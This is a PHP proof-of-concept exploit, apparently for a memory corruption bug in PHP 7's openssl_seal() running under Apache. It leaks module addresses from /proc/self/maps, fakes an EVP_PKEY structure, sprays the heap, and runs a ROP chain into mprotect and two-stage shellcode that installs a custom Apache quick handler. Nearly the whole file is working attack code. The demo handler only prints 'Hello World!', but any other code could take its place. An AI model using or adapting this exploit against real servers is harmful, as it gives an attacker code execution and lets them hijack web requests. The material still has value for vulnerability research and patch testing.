
<?php
// Source: http://akat1.pl/?id=1
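function get_maps() {
    // Read this process's memory map (/proc/self/maps) and return it as one
    // array element per line.
    //
    // Returns an empty array when the file cannot be opened (non-Linux host,
    // restricted /proc) instead of handing a `false` handle to fread(), which
    // is a TypeError on PHP 8 and an undefined read on PHP 7.
    $fh = fopen("/proc/self/maps", "r");
    if ($fh === false) {
        return array();
    }
    // Read to EOF rather than a fixed 331337-byte cap, so a long maps file is
    // not silently truncated.
    $maps = stream_get_contents($fh);
    fclose($fh);
    if ($maps === false) {
        return array();
    }
    return explode("\n", $maps);
}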
function find_map($sym) {
    // Return the start address of the first executable ("r-xp") record in
    // /proc/self/maps whose text contains $sym. Dies when no such record
    // exists (or when its start address parses to 0).
    $base = 0;
    foreach (get_maps() as $line) {
        if (!strstr($line, $sym)) {
            continue;
        }
        if (!strstr($line, "r-xp")) {
            continue;
        }
        // Record layout is "start-end perms ..."; take the hex start field.
        $base = hexdec(explode('-', $line)[0]);
        break;
    }

    if ($base == 0) {
        die("[-] can't find $sym base, you need an information leak :[");
    }

    return $base;
}
function fill_buffer($offset, $content) {
    // Overwrite the global $buffer in place, one byte at a time, starting at
    // string offset $offset with the bytes of $content. Nothing is returned;
    // an empty $content leaves $buffer untouched. Writing past the end of
    // $buffer follows PHP's string-offset assignment rules (no explicit growth).
    global $buffer;
    $len = strlen($content);
    $pos = 0;
    while ($pos < $len) {
        $buffer[$offset + $pos] = $content[$pos];
        $pos++;
    }
    return;
}
// --- Proof-of-concept body. Uses get_maps(), find_map() and fill_buffer()
// defined above. The script ends on the final "[-] failed" echo, which is
// reached only when openssl_seal() returns normally. Every "+ 0x..." term
// below is a literal constant: only the module bases are read from
// /proc/self/maps at run time, so these offsets appear to be tied to one
// specific build of libphp7 / libc / apache2 — TODO confirm against the
// target named in the title before treating them as general.
$pre = get_maps();
$buffer = str_repeat("\x00", 0xff0000);
$post = get_maps();

$tmp = array_diff($post, $pre); // map records that appeared after allocating $buffer

if (count($tmp) != 1)
die('[-] you need an information leak :[');

$buffer_base = hexdec(explode('-',array_values($tmp)[0])[0]); // start of the mapping holding $buffer
$addr = $buffer_base+0x14; /* align to string */

echo "[+] buffer string @ 0x".dechex($addr)."\n";

$align = 0xff;
$addr += $align;

echo "[+] faking EVP_PKEY @ 0x".dechex($addr)."\n";
echo "[+] faking ASN @ 0x".dechex($addr)."\n";
fill_buffer($align + 12, pack('P', $addr)); // 'P' = 64-bit unsigned, machine byte order

$libphp_base = find_map("libphp7");
echo "[+] libphp7 base @ 0x".dechex($libphp_base)."\n";

/* pop x ; pop rsp ; ret - stack pivot */
$rop_addr = $libphp_base + 0x00000000004a79c3;
echo "[+] faking pkey_free @ 0x".dechex($addr+0xa0-4)." = ".dechex($rop_addr)."\n";
fill_buffer($align + 0xa0 - 4, pack('P', $rop_addr));

/* pop rbp ; pop rbp ; ret - clean up the stack after pivoting */
$rop_addr = $libphp_base + 0x000000000041d583;
fill_buffer($align - 4, pack('P', $rop_addr));

$libc_base = find_map("libc-");
echo "[+] libc base @ 0x".dechex($libc_base)."\n";

$mprotect_offset = 0xf4a20; // literal libc offset, not resolved at run time
$mprotect_addr = $libc_base + $mprotect_offset;
echo "[+] mprotect @ 0x".dechex($mprotect_addr)."\n";

$mmap_offset = 0xf49c0; // literal libc offset, not resolved at run time
$mmap_addr = $libc_base + $mmap_offset;
echo "[+] mmap @ 0x".dechex($mmap_addr)."\n";

$apache2_base = find_map("/usr/sbin/apache2");
echo "[+] apache2 base @ 0x".dechex($apache2_base)."\n";

$ap_rprintf_offset = 0x429c0; // literal apache2 offset, not resolved at run time
$ap_rprintf_addr = $apache2_base + $ap_rprintf_offset;
echo "[+] ap_rprintf @ 0x".dechex($ap_rprintf_addr)."\n";

$ap_hook_quick_handler_offset = 0x56c00; // literal apache2 offset, not resolved at run time
$ap_hook_quick_handler_addr = $apache2_base + $ap_hook_quick_handler_offset;
echo "[+] ap_hook_quick_handler @ 0x".dechex($ap_hook_quick_handler_addr)."\n";

echo "[+] building ropchain\n";
$rop_chain =
pack('P', $libphp_base + 0x00000000000ea107) . // pop rdx ; ret
pack('P', 0x0000000000000007) . // rdx = 7
pack('P', $libphp_base + 0x00000000000e69bd) . // pop rsi ; ret
pack('P', 0x0000000000004000) . // rsi = 0x4000 (the original annotation said 0x1000; the literal is 0x4000)
pack('P', $libphp_base + 0x00000000000e5fd8) . // pop rdi ; ret
pack('P', $addr ^ ($addr & 0xffff)) . // rdi = page aligned addr
pack('P', $mprotect_addr) . // mprotect addr
pack('P', ($addr ^ ($addr & 0xffff)) | 0x10ff); // return to shellcode_stage1
fill_buffer($align + 0x14, $rop_chain);

$shellcode_stage1 = str_repeat("\x90", 512) .
"\x48\xb8" . pack('P', $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax
"\x49\xb8" . pack('P', 0x1000) . // handler size
"\x48\xb9" . pack('P', $buffer_base + 0x3018) . // handler
"\x48\xba" . pack('P', $ap_hook_quick_handler_addr) . // movabs ap_hook_quick_handler, %rdx
"\x48\xbe" . pack('P', 0) . // UNUSED
"\x48\xbf" . pack('P', $mmap_addr) . // movabs mmap,%rdi
"\xff\xd0" . // callq %rax
"\xb8\x27\x00\x00\x00" . // mov $0x27,%eax - getpid syscall
"\x0f\x05" . // syscall
"\xbe\x1b\x00\x00\x00" . // mov $0x1b,%esi - SIGPROF (27); the original annotation's "$0xd" does not match the bytes
"\x89\xc7" . // mov %eax,%edi - pid
"\xb8\x3e\x00\x00\x00" . // mov $0x3e,%eax - kill syscall
"\x0f\x05"; // syscall
fill_buffer(0x1000, $shellcode_stage1);

$shellcode_stage2 = str_repeat("\x90", 512) .
"\x55" . // push %rbp
"\x48\x89\xe5" . // mov %rsp,%rbp
"\x48\x83\xec\x40" . // sub $0x40,%rsp
"\x48\x89\x7d\xe8" . // mov %rdi,-0x18(%rbp)
"\x48\x89\x75\xe0" . // mov %rsi,-0x20(%rbp)
"\x48\x89\x55\xd8" . // mov %rdx,-0x28(%rbp)
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
"\x4c\x89\x45\xc8" . // mov %r8,-0x38(%rbp)
"\x48\x8b\x45\xe8" . // mov -0x18(%rbp),%rax
"\x41\xb9\x00\x00\x00\x00" . // mov $0x0,%r9d
"\x41\xb8\xff\xff\xff\xff" . // mov $0xffffffff,%r8d
"\xb9\x22\x00\x00\x00" . // mov $0x22,%ecx
"\xba\x07\x00\x00\x00" . // mov $0x7,%edx
"\xbe\x00\x20\x00\x00" . // mov $0x2000,%esi
"\xbf\x00\x00\x00\x00" . // mov $0x0,%edi
"\xff\xd0" . // callq *%rax
"\x48\x89\x45\xf0" . // mov %rax,-0x10(%rbp)
"\x48\x8b\x45\xf0" . // mov -0x10(%rbp),%rax
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
"\xeb\x1d" . // jmp 0x40063d <shellcode+0x6d>
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
"\x48\x8d\x50\x01" . // lea 0x1(%rax),%rdx
"\x48\x89\x55\xf8" . // mov %rdx,-0x8(%rbp)
"\x48\x8b\x55\xd0" . // mov -0x30(%rbp),%rdx
"\x48\x8d\x4a\x01" . // lea 0x1(%rdx),%rcx
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
"\x0f\xb6\x12" . // movzbl (%rdx),%edx
"\x88\x10" . // mov %dl,(%rax)
"\x48\x8b\x45\xc8" . // mov -0x38(%rbp),%rax
"\x48\x8d\x50\xff" . // lea -0x1(%rax),%rdx
"\x48\x89\x55\xc8" . // mov %rdx,-0x38(%rbp)
"\x48\x85\xc0" . // test %rax,%rax
"\x75\xd2" . // jne 0x400620 <shellcode+0x50>
"\x48\x8b\x7d\xf0" . // mov -0x10(%rbp),%rdi
"\x48\x8b\x45\xd8" . // mov -0x28(%rbp),%rax
"\xb9\xf6\xff\xff\xff" . // mov $0xfffffff6,%ecx
"\xba\x00\x00\x00\x00" . // mov $0x0,%edx
"\xbe\x00\x00\x00\x00" . // mov $0x0,%esi
"\xff\xd0" . // callq *%rax
"\xc9" . // leaveq
"\xc3"; // retq
fill_buffer(0x2000, $shellcode_stage2);

// The handler only writes "Hello World!\n" through ap_rprintf (see the two
// movabs of the literal text below); that string is the observable marker of a
// successful run.
$handler =
"\x55" . // push %rbp
"\x48\x89\xe5" . // mov %rsp,%rbp
"\x48\x83\xec\x30" . // sub $0x30,%rsp
"\x48\x89\x7d\xd8" . // mov %rdi,-0x28(%rbp)
"\x48\xb8" . pack('P', $ap_rprintf_addr) . // movabs $ap_rprintf_addr,%rax (the 0xdeadbabefeedcafe placeholder is patched here)
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
"\x48\xb8" . "Hello Wo" . // movabs CONTENT,%rax
"\x48\x89\x45\xe0" . // mov %rax,-0x20(%rbp)
"\x48\xb8" . "rld!\n\x00\x00\x00" . // movabs CONTENT,%rax
"\x48\x89\x45\xe8" . // mov %rax,-0x18(%rbp) (encoding 0xe8 = -0x18; the original annotation said -0x20)
"\x48\x8d\x4d\xe0" . // lea -0x20(%rbp),%rcx
"\x48\x8b\x55\xd8" . // mov -0x28(%rbp),%rdx
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
"\x48\x89\xce" . // mov %rcx,%rsi
"\x48\x89\xd7" . // mov %rdx,%rdi
"\xff\xd0" . // callq *%rax
"\xb8\x00\x00\x00\x00" . // mov $0x0,%eax
"\xc9" . // leaveq
"\xc3"; // retq
fill_buffer(0x3000, $handler);

$addr = pack('P', $addr); // $addr is now the packed 8-byte form, no longer an integer
$memory = str_repeat($addr,321);

$pem = "
-----BEGIN PUBLIC KEY-----
MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ==
-----END PUBLIC KEY-----"; /* Random RSA key */

$a = array_fill(0,321,0); // 321 entries, all the integer 0 except the first three
/* place valid keys at the beginning */
$k = openssl_pkey_get_public($pem);
$a[0] = $k; $a[1] = $k; $a[2] = $k;
echo "[+] spraying heap\n";
$x = array();
for ($i = 0 ; $i < 20000 ; $i++) {
$x[$i] = str_repeat($memory, 1); // str_repeat(..., 1) forces a fresh copy of $memory per element
}
for ($i = 0 ; $i < 20000 ; $i++) {
unset($x[$i]);
}
unset($x);
echo "[+] triggering openssl_seal()...\n";
// $_ is a throwaway variable for the three by-reference output parameters;
// the @ suppresses any warning openssl_seal() emits about the key array.
@openssl_seal($_, $_, $_, $a);
echo "[-] failed ;[\n";